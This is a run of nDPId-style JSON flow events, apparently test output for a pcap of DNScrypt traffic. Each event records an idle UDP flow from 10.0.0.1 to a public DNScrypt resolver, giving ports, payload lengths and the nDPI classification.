-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 